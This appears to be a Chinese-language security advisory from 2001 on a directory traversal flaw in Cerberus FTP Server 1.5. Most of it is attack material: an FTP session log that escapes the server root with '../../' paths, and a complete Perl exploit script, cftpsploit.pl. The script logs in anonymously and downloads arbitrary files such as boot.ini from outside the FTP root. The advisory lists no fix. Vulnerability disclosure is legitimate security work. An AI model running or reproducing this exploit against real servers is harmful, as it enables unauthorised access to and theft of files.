Cerberus FTP 服务程序存在目录遍历漏洞发布时间:2001-08-22 更新时间:2001-08-22 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Cerberus FTP Server version 1.5详细描述 Cerberus FTP(http://www.greenepa.net/~averett/cerberus.htm)服务 程序是基于WINDOWS下的多线程FTP服务程序,使用较少的CPU和内存, 其中存在安全漏洞可以导致攻击者绕过FTP ROOT目录的限制。 测试代码 220-Welcome to Cerberus FTP Server 220 Created by Grant Averett Benutzer (192.168.0.2:(none)): anonymous 230 User anonymous logged in ftp> ls 200 Port command received 150 Opening data connection delphiown 226 Transfer complete FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s ftp> cd delphiown/../../ 250 Change directory ok ftp> ls 200 Port command received 150 Opening data connection #!usr/bin/perl # this exploit will download files from # the ftp server, even if they are outside of # root directory. use Net::FTP; $loginname='anonymous'; $passwd=''; $dirname= ''; print "\n-----------------------------------\n"; print "Cerberus Ftp server 1.5\n"; print "directory traversal exploit\n"; print "by Christoph Heindl\n"; print "se00020\@fhs-hagenberg.ac.at\n"; print "-----------------------------------\n"; if (!$ARGV[0] || !$ARGV[1]){ print "usage: cftpsploit.pl <host> <dir/file>\n"; print " example: cftpsploit.pl 192.168.0.2 boot.ini\n"; print " will download boot.ini from c:\ if server is running on drive c\n"; exit; } $ipaddr=$ARGV[0]; $ftp=Net::FTP->new($ipaddr, Timeout=>5); if (!$ftp->login($loginname, $passwd)){ die "\ncould not login\n"; } print "searching for directory..."; foreach $dir ($ftp->ls()) { next unless ($ftp->cwd($dir)); $dirname=$dir; $ftp->cwd('..'); } if ($dirname eq '') { print "failed\n"; print "trying to create pseudo dir..."; $mkd=$ftp->mkdir('pseudo'); if ($mkd) { print "ok\n"; $dirname="pseudo"; } else { print "failed\n"; print "exiting...\n"; exit(0); } } print "found dir\n"; print "dirname is: ".$dirname."\n"; $pathtofile=$dirname."/../../"; print "getting file...\n"; $ftp->get($pathtofile.$ARGV[1]); $ftp->quit; print "all done. file located in current dir"; 解决方案 尚无 相关信息 Christoph.Heindl at fhs-hagenberg.ac.at |
